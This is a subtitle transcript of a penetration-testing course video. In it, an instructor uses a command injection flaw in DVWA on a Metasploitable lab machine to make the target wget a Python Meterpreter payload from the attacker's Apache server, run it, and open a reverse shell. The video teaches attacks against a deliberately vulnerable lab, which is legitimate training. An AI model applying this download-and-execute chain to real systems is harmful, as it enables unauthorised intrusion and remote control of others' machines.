1
00:00:00,270 --> 00:00:03,780
Instructor: Okay, so we have covered command injection

2
00:00:03,780 --> 00:00:06,240
but you can combine this vulnerability

3
00:00:06,240 --> 00:00:08,520
with other tools as well.

4
00:00:08,520 --> 00:00:10,710
For example, in the last video

5
00:00:10,710 --> 00:00:13,860
we managed the established connection using netcat

6
00:00:13,860 --> 00:00:16,140
and command injection vulnerability.

7
00:00:16,140 --> 00:00:17,460
But we can improve this

8
00:00:17,460 --> 00:00:21,450
by injecting a different payload such as a meterpreter shell

9
00:00:21,450 --> 00:00:24,990
or a reverse shell that we coded in Python.

10
00:00:24,990 --> 00:00:27,120
The process of doing that is the same.

11
00:00:27,120 --> 00:00:30,270
So I'll show you how to send a meterpreter payload

12
00:00:30,270 --> 00:00:34,740
to the target and make it execute with command injection.

13
00:00:34,740 --> 00:00:36,450
Why would we want to do this?

14
00:00:36,450 --> 00:00:40,200
Well, we always want to have the best payload possible.

15
00:00:40,200 --> 00:00:43,710
So why would we use netcat when meterpreter gives us

16
00:00:43,710 --> 00:00:47,670
a lot more useful options to run on the target system?

17
00:00:47,670 --> 00:00:48,990
And to do all of that

18
00:00:48,990 --> 00:00:51,810
here are the steps that we must perform.

19
00:00:51,810 --> 00:00:55,770
We must first create the payload appropriate for our target.

20
00:00:55,770 --> 00:00:59,610
Then we must download that payload to our target machine

21
00:00:59,610 --> 00:01:02,310
with the help of command injection vulnerability.

22
00:01:02,310 --> 00:01:06,330
And at last, we must execute that payload also

23
00:01:06,330 --> 00:01:09,480
with the help of command injection vulnerability.

24
00:01:09,480 --> 00:01:12,030
So sounds pretty simple, right?

25
00:01:12,030 --> 00:01:15,420
Let's figure out what payload we should create first.

26
00:01:15,420 --> 00:01:17,670
So to create payload, we need to figure out

27
00:01:17,670 --> 00:01:20,220
what do we know about our target?

28
00:01:20,220 --> 00:01:24,900
Well, we know that meta portable is a Linux 32 bit machine

29
00:01:24,900 --> 00:01:28,260
so we can create a Linux meterpreter payload.

30
00:01:28,260 --> 00:01:32,190
But for this case I like Python payload a lot better.

31
00:01:32,190 --> 00:01:35,373
So let's create a Python meterpreter shell.

32
00:01:36,270 --> 00:01:38,100
Great thing about Linux systems

33
00:01:38,100 --> 00:01:40,290
is it comes default with Python.

34
00:01:40,290 --> 00:01:42,510
So Python payload is something that

35
00:01:42,510 --> 00:01:44,520
we can execute on our target

36
00:01:44,520 --> 00:01:48,060
without them having to install any additional software.

37
00:01:48,060 --> 00:01:49,950
Let's create it real quick.

38
00:01:49,950 --> 00:01:52,410
So I will navigate to my desktop directory

39
00:01:52,410 --> 00:01:54,070
and here I will type msfvenom-p

40
00:01:56,190 --> 00:01:57,690
and that will specify that we want

41
00:01:57,690 --> 00:02:02,690
to create Python meterpreter slash reverse tcp.

42
00:02:04,230 --> 00:02:07,320
The LHOST is going to be our IP address.

43
00:02:07,320 --> 00:02:10,203
So let's check it out real quick.

44
00:02:12,420 --> 00:02:17,420
It is 192.168.1.9, copy it and paste it right here.

45
00:02:19,020 --> 00:02:20,220
For the LPORT,

46
00:02:20,220 --> 00:02:23,340
we can use port 6,000 for example,

47
00:02:23,340 --> 00:02:27,780
and we are going to output this to arrows

48
00:02:27,780 --> 00:02:30,210
into tester.py.

49
00:02:30,210 --> 00:02:31,890
And I just named the payload tester,

50
00:02:31,890 --> 00:02:35,370
but feel free to name it anything that you want.

51
00:02:35,370 --> 00:02:36,840
I will press enter here

52
00:02:36,840 --> 00:02:39,183
and this will create our Python payload.

53
00:02:40,050 --> 00:02:42,600
Let me go right here, lower this,

54
00:02:42,600 --> 00:02:44,100
and while this is creating,

55
00:02:44,100 --> 00:02:46,890
make sure that your burp suite is started up.

56
00:02:46,890 --> 00:02:49,860
Also make sure that your intercept is turned off

57
00:02:49,860 --> 00:02:52,830
and start up your Firefox

58
00:02:52,830 --> 00:02:57,120
and your metasportable virtual machine. Okay?

59
00:02:57,120 --> 00:03:00,240
So once you do that here in just a few seconds,

60
00:03:00,240 --> 00:03:01,983
our payload should be done.

61
00:03:02,940 --> 00:03:04,290
And here it is.

62
00:03:04,290 --> 00:03:06,960
Now that we got a payload created, we must figure out

63
00:03:06,960 --> 00:03:09,990
how can we deliver it to the target system?

64
00:03:09,990 --> 00:03:12,900
Of course we will do that using the command injection

65
00:03:12,900 --> 00:03:15,147
but even then the target must be able

66
00:03:15,147 --> 00:03:18,840
to download our payload from somewhere, right?

67
00:03:18,840 --> 00:03:21,636
For this, we're going to use apache2 web server

68
00:03:21,636 --> 00:03:24,780
and host our payload there.

69
00:03:24,780 --> 00:03:26,700
Apache comes with Kali Linux already

70
00:03:26,700 --> 00:03:29,460
so we can make it run real quick.

71
00:03:29,460 --> 00:03:31,770
To do that, we must first type pseudo

72
00:03:31,770 --> 00:03:36,150
and then service apache2 start.

73
00:03:36,150 --> 00:03:37,980
It will ask us for the password.

74
00:03:37,980 --> 00:03:39,330
We input the password

75
00:03:39,330 --> 00:03:42,630
and this will start our apache2 web server.

76
00:03:42,630 --> 00:03:43,650
What does this mean?

77
00:03:43,650 --> 00:03:46,710
Well, this means that any file that is hosted inside

78
00:03:46,710 --> 00:03:50,220
of slash var, slash www slash html directory

79
00:03:50,220 --> 00:03:53,250
in our Kali Linux will be hosted on our webpage

80
00:03:53,250 --> 00:03:56,220
to anyone that visits our IP address.

81
00:03:56,220 --> 00:03:59,940
Let's first of all visit that directory.

82
00:03:59,940 --> 00:04:04,940
So if it goes cd/var/www,html, type ls here

83
00:04:04,980 --> 00:04:07,950
and we got shell.exe from some previous video

84
00:04:07,950 --> 00:04:09,933
which we can delete straight away.

85
00:04:11,130 --> 00:04:13,860
And this might require root privileges.

86
00:04:13,860 --> 00:04:17,700
So let us just enter root accounts, sudo su

87
00:04:17,700 --> 00:04:21,180
and let's delete this shell.exe.

88
00:04:21,180 --> 00:04:23,430
And now our directory is empty,

89
00:04:23,430 --> 00:04:26,640
so no files are being hosted on our web server.

90
00:04:26,640 --> 00:04:28,110
Let's copy our tester,

91
00:04:28,110 --> 00:04:30,450
which in my case is in my home directory,

92
00:04:30,450 --> 00:04:33,390
Mr. Hacker and desktop tester.py.

93
00:04:33,390 --> 00:04:38,193
And we want to copy it inside of var www and html.

94
00:04:39,810 --> 00:04:42,780
And now if we were to go to our Kali Linux machine

95
00:04:42,780 --> 00:04:46,050
and visit the IP address of my Kali Linux

96
00:04:46,050 --> 00:04:51,050
which is 192.168.1.9, we are going to see this page

97
00:04:51,270 --> 00:04:54,570
that has this file available to download.

98
00:04:54,570 --> 00:04:56,970
Great. All we are left to do right now

99
00:04:56,970 --> 00:05:00,360
is to execute this file on target system.

100
00:05:00,360 --> 00:05:02,580
Let's go to our command injection page

101
00:05:02,580 --> 00:05:04,323
on our metasploitable.

102
00:05:05,460 --> 00:05:08,430
And to do that we visit the IP address of metasploitable

103
00:05:08,430 --> 00:05:09,960
navigate to DVWA.

104
00:05:09,960 --> 00:05:14,400
All of this we already know, let us enter username

105
00:05:14,400 --> 00:05:16,830
and password and go to the command injection.

106
00:05:16,830 --> 00:05:18,210
But before we do that

107
00:05:18,210 --> 00:05:21,693
change the security level to either low or media.

108
00:05:22,950 --> 00:05:25,890
Once we do that inside of the command ejection,

109
00:05:25,890 --> 00:05:29,430
we can execute the commands as from the previous video.

110
00:05:29,430 --> 00:05:33,780
So if I type right here, 192.168.1.1

111
00:05:33,780 --> 00:05:37,740
and dot and comma and then ls after it

112
00:05:37,740 --> 00:05:39,900
it'll ping the router's IP address

113
00:05:39,900 --> 00:05:43,560
and it'll also print out the contents of that directory.

114
00:05:43,560 --> 00:05:45,480
But we don't want to ping every time.

115
00:05:45,480 --> 00:05:47,940
We can just type dot and comma, which will specify

116
00:05:47,940 --> 00:05:49,590
that we want to enter a next command

117
00:05:49,590 --> 00:05:51,690
and we can just type ls after it.

118
00:05:51,690 --> 00:05:55,080
And this will just give us an output of the ls command

119
00:05:55,080 --> 00:05:58,530
and we won't have to wait for the ping command to finish.

120
00:05:58,530 --> 00:06:02,460
Now, let's download our payload using wget command

121
00:06:02,460 --> 00:06:04,350
and wget is something that you can run

122
00:06:04,350 --> 00:06:07,161
from a terminal in order to download a specific file

123
00:06:07,161 --> 00:06:10,560
from the page or link that you specify.

124
00:06:10,560 --> 00:06:13,290
Let me show you inside of terminal first.

125
00:06:13,290 --> 00:06:15,300
So right now I am inside

126
00:06:15,300 --> 00:06:18,630
of the slash home slash mr hacker directory.

127
00:06:18,630 --> 00:06:21,600
And I don't have the tester.py right here

128
00:06:21,600 --> 00:06:23,790
but if I run the command wget

129
00:06:23,790 --> 00:06:27,390
and then 192.168.1.9, which is the IP address

130
00:06:27,390 --> 00:06:31,140
of Kali Linux slash and then tester.py.

131
00:06:31,140 --> 00:06:34,800
With this link, we are accessing this page right here

132
00:06:34,800 --> 00:06:37,020
and this file right here,

133
00:06:37,020 --> 00:06:39,690
which will tell our terminal that we want

134
00:06:39,690 --> 00:06:41,370
to download that file.

135
00:06:41,370 --> 00:06:44,610
If I press enter, it'll download tester.py

136
00:06:44,610 --> 00:06:46,980
and if I type ls once again,

137
00:06:46,980 --> 00:06:49,980
now we have tester.py inside of our home

138
00:06:49,980 --> 00:06:52,350
and Mr. Hacker directory.

139
00:06:52,350 --> 00:06:56,820
We want to do the same thing on our target machine.

140
00:06:56,820 --> 00:06:59,040
So to do that we can use dot and comment

141
00:06:59,040 --> 00:07:01,710
to specify the next command and type the same command,

142
00:07:01,710 --> 00:07:06,710
wget 192.168.1.9/tester.py.

143
00:07:09,630 --> 00:07:11,640
I press submit.

144
00:07:11,640 --> 00:07:15,060
And if I run the ls command once again,

145
00:07:15,060 --> 00:07:18,753
now we have one additional file which is our payload.

146
00:07:19,770 --> 00:07:23,103
So it is there, it is on the target machine right now

147
00:07:23,103 --> 00:07:24,903
with the help of command injection.

148
00:07:25,800 --> 00:07:28,230
The last step we have to do is to set up

149
00:07:28,230 --> 00:07:30,630
a listener inside of MSF console.

150
00:07:30,630 --> 00:07:32,493
So let's do that real quick.

151
00:07:33,840 --> 00:07:37,533
And after we set up a listener, we must execute our payload.

152
00:07:38,520 --> 00:07:39,870
And here is the MSF console.

153
00:07:39,870 --> 00:07:42,690
We are already familiar with setting up of the listener.

154
00:07:42,690 --> 00:07:45,120
We are going to use exploit multi handler

155
00:07:45,120 --> 00:07:48,750
and we need to set the payload to be

156
00:07:48,750 --> 00:07:52,920
python/meterpreter/reverse_tcp.

157
00:07:56,730 --> 00:07:59,670
If I show options, all we want to do is set

158
00:07:59,670 --> 00:08:02,700
the LHOST and LPORT and that will be the IP address

159
00:08:02,700 --> 00:08:06,810
of Kali Linux and the LPORT will be 6,000,

160
00:08:06,810 --> 00:08:10,200
the same options that we specified inside of msfs.

161
00:08:10,200 --> 00:08:11,340
Why not?

162
00:08:11,340 --> 00:08:14,790
Then I will run this and all we are left to do right now

163
00:08:14,790 --> 00:08:17,040
is to execute this tester.py

164
00:08:17,040 --> 00:08:18,630
with the help of command injection.

165
00:08:18,630 --> 00:08:20,610
So let's see how we can do that.

166
00:08:20,610 --> 00:08:25,610
If I type dot and comma and python tester.py, press enter,

167
00:08:28,440 --> 00:08:30,330
this page will load.

168
00:08:30,330 --> 00:08:33,120
And these are good news because that would most likely mean

169
00:08:33,120 --> 00:08:35,850
that we got the meterpreter shell opened.

170
00:08:35,850 --> 00:08:39,000
With the help of Python, we executed our Python program

171
00:08:39,000 --> 00:08:43,020
on the target machine and it opened our meterpreter shell

172
00:08:43,020 --> 00:08:45,390
where we can execute various commands.

173
00:08:45,390 --> 00:08:47,610
As usual, we can run help command

174
00:08:47,610 --> 00:08:49,920
to see what else we can execute

175
00:08:49,920 --> 00:08:53,040
and we can basically perform post exploitation

176
00:08:53,040 --> 00:08:54,750
that we already covered.

177
00:08:54,750 --> 00:08:56,520
Great. So this is just another way

178
00:08:56,520 --> 00:08:58,350
that you can use command ejection

179
00:08:58,350 --> 00:09:00,960
to your advantage to spawn a better payload

180
00:09:00,960 --> 00:09:04,500
than just a simple netcat command execution.

181
00:09:04,500 --> 00:09:05,910
So you can try to test this

182
00:09:05,910 --> 00:09:08,970
with our Python payload if you want.

183
00:09:08,970 --> 00:09:12,180
Great. Now that we cover the command ejection vulnerability,

184
00:09:12,180 --> 00:09:14,250
in the next video we're going to go

185
00:09:14,250 --> 00:09:16,830
into cross site scripting vulnerability.

186
00:09:16,830 --> 00:09:18,183
See you there.